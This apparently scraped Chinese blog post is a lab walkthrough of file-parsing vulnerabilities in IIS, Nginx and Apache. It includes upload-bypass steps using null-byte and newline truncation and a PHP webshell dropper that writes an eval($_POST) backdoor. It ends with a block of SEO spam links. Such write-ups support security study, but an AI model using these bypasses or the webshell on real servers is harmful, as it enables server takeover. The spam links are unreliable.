当前位置: 首页 > wzjs >正文

银行官方网站小工具 wordpress

银行官方网站,小工具 wordpress,微信公众号文章编辑wordpress,网络推广方法一、IIS解析漏洞 &#xff08;一&#xff09;iis6的目录解析漏洞(.asp目录中的所有文件都会被当做asp文件执行) 第一步&#xff1a;在网站根目录下创建了一个x.asp文件夹&#xff0c;并在文件夹中创建一个名为1.txt的文本文档 第二步&#xff1a;文本文档中输入<% now()%&…

一、IIS解析漏洞

(一)iis6的目录解析漏洞(.asp目录中的所有文件都会被当做asp文件执行)
第一步:在网站根目录下创建了一个x.asp文件夹,并在文件夹中创建一个名为1.txt的文本文档

第二步:文本文档中输入<% =now()%>

第三步:访问1.txt, 返回了的当前日期和时间值

(二)iis6的分号截断解析漏洞(1.asp;.jpg 分号起到截断的效果)
第一步:在网站根目录新建文件1.asp;.txt

第二步:访问1.asp;.txt, 返回了的当前日期和时间值

被服务器看成是1.asp

(三)iis6的畸形后缀解析(.asa/.cer/.cdx的文件都会被当做asp文件执行)
第一步:在网站根目录新建文件1.asa

第二步:访问1.asa, 返回了的当前日期和时间值

(四)iis7的phpcgi解析漏洞(在文件末尾 加上 /.php,文件就会被当做php文件)
第一步:物理机安装IIS后,安装PHPstudy for IIS
第二步:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1前的分号删去

第三步:IIS --- 配置⽹站 --- 处理程序映射 --- PHPStudy_FastCGI --- 请求限制 --- 取消勾选
第四步:在网站根目录新建文件phpinfo.jpg

第五步:访问phpinfo.jpg/.php,发现phpinfo.jpg被当作php文件运行

二、Nginx解析漏洞

(一)nginx的phpcgi解析漏洞(同上)
第一步:加工docker-compose.yml,添加版本号,更改映射端口为82

第二步:docker-compose up -d 创建并启动容器

第三步:访问http://47.103.81.25:82/,成功访问,上传文件成功

#上传保存位置
/var/www/html/uploadfiles/0412c29576c708cf0155e8de242169b1.jpg
第四步:访问test.jpg/.php,发现test.jpg被当作php文件运行

#URL
http://47.103.81.25:82/uploadfiles/0412c29576c708cf0155e8de242169b1.jpg/.php
(二)nginx的00截断解析漏洞(上传的时候两个空格,第二个空格20改成00可以起到截断的作用)
第一步:加工docker-compose.yml,添加版本号,更改映射端口为8080

第二步:docker-compose up -d 创建并启动容器
第三步:访问http://47.103.81.25:8080/,直接选择php文件上传,显示 Unsupported filetype uploaded.

第四步:重新选择phpinfo.jpg,打开bp进行抓包,并加2个空格.php,点击HEX,将第2个空格位置改为00,放行,显示文件成功上传

上传的文件名为phpinfo.jpg0x200x00.php

第五步:访问phpinfo.jpg,404

第六步:由于404抓不到包,删去g,回车抓包;修改文件名为phpinfo.jpg空格空格.php

第七步:修改HEX也为0x200x00,即访问的文件名也为phpinfo.jpg0x200x00.php,放行,访问成功

00起到截断作用,服务器认为是允许的jpg文件,但中间件认为00是文件名的一部分

三、Apache解析漏洞

(一)apache的从右往左解析漏洞(apache的解析规则是从右往左,右边的不认识会往左递归)

靶场暂缺

(二)apache的多后缀解析漏洞(apache会为不同的后缀执行不同的指令)
第一步:加工docker-compose.yml,添加版本号,更改映射端口为81

第二步:docker-compose up -d 创建并启动容器

第三步:访问http://47.103.81.25:81/,成功访问,上传文件成功

第四步:访问上传的father.php.jpg,使其生成木马

#father.php.jpg文件内容
GIF89a
<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
第五步:访问生成的webshell.php,成功getshell

(三)apache的0a换行解析漏洞(在文件未尾加上空格,空格的20改成0a,访问文件的时候加上%0a)
第一步:修改配置文案,端口为8081,启动docker

第二步:访问并上传文件,bp抓包,在evil后面加一个空格

第三步:点击HEX,找到添加的空格位置,改为0a(%00 --> %0a),放行

第四步:访问phpinfo(),成功访问

                                                                                                                        FROM  IYU_ 


文章转载自:

http://cRkFnFjg.zgdnz.cn
http://f0DsYLCY.zgdnz.cn
http://yfk9TuHh.zgdnz.cn
http://jG79AtvR.zgdnz.cn
http://uEe1udtu.zgdnz.cn
http://yjaKDdYF.zgdnz.cn
http://IT39PkPF.zgdnz.cn
http://1pj4JFUR.zgdnz.cn
http://c92LfVkN.zgdnz.cn
http://g4QjLIZC.zgdnz.cn
http://rTDK2lUf.zgdnz.cn
http://dH4yV5wU.zgdnz.cn
http://8AI2zuG5.zgdnz.cn
http://feWV3haw.zgdnz.cn
http://lE0SVN8s.zgdnz.cn
http://HsYiWZma.zgdnz.cn
http://SHNcsaIS.zgdnz.cn
http://6k5qB49M.zgdnz.cn
http://dESTtTRr.zgdnz.cn
http://BxKkIzIX.zgdnz.cn
http://GWZNgAzm.zgdnz.cn
http://S78Dr8yn.zgdnz.cn
http://oWmsT4OA.zgdnz.cn
http://4RAtJX7H.zgdnz.cn
http://OoQgoYZY.zgdnz.cn
http://aTxC8PSR.zgdnz.cn
http://O6pF78Nf.zgdnz.cn
http://1jKgTQW9.zgdnz.cn
http://yQ5uNyuc.zgdnz.cn
http://DepDcnf8.zgdnz.cn
http://www.dtcms.com/wzjs/645219.html

相关文章:

  • 做印刷网站公司wordpress function require
  • ui设计公司网站wordpress文章底部
  • 域名备案的网站建设书建设一个网站主要受哪些因素的影响
  • 甘肃住房与城乡建设部网站高端网站设计v芯hyhyk1推好
  • 深圳 网站设手机端网站开发教程
  • 电子商务网站的建设论文物流行业网站建设方案
  • 苏州专业网站设计制作公司设计之家官网效果图
  • 网站备案时要不要关闭内容营销包括
  • 建设商城网站多少钱域名证书怎么申请
  • 哪个网站可以上传设计的作品怎么做网站seo优化
  • 丹灶建网站sap.net网站开发
  • 贵州省住房和城乡建设厅网网站网站带支付源码
  • 做自己的网站流量怎么如何注册属于自己的网站
  • 成品软件源码网站大全阿里服务器可以做多少个网站
  • o2o商超网站建设手机怎么创建自己的网站平台
  • 移动网站seo推广计划方案模板
  • 北京网络网站建设价格低公司网站要备案吗
  • 北京外包网站怎么制作网站
  • 图片素材网站哪个最多牛商网网站后台
  • 丹东网站seo我的网站在百度搜不到了
  • 网站建设制作设计建设银行网站怎么打印明细
  • 上海嘉定网站建设公司漂亮的数据型网站
  • 网站正在建设中...为什么护卫神华龙网重庆网络问政平台
  • 四川网站建设多少钱建站平台wp
  • 网站建设优缺点wordpress 变装小说
  • 网页设计与网站建设全攻略樱桃企业网站管理系统v1.1-cms
  • 浙江建设职业技术学院继续教育学院网站网推app下载
  • 网站建设微信运营推广小程序流量点击推广平台
  • 家用电器行业外贸建站搜房网站建设分析
  • 建设互联网教育网站建筑直聘网